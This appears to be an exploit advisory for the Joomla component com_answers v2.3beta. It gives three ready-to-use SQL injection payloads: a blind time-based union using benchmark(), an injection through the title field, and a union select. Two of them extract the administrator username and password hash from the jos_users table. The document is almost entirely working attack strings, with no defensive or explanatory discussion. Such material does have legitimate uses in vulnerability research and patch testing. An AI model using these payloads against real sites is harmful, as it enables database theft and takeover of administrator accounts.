Joomla Component com_answers v2.3beta Multiple Vulnerabilities

2010-06-19 09:18:46

# Exploit Title: Joomla Component Answers v2.3beta Multiple Vulnerabilities
# Date: 25 May 2010
# Author: jdc
# Software Link:
# Version: 2.3beta
# Tested on: PHP5, MySQL5

Blind SQL Injection
Requires: magic_quotes OFF

&id=-1' union select benchmark(100000,md5(5)) as a -- '

Title Field SQL Injection
title',(select concat(username,char(32),password) from jos_users where
gid=25 limit 1),'0','1','0','','') -- ;

SQL Injection
Requires: magic_quotes OFF, Joomla! debug OFF

&id=-1' union select concat(username,char(32),password),2,3,4,5,6,7,8,9
from jos_users where gid=25 limit 1 -- '


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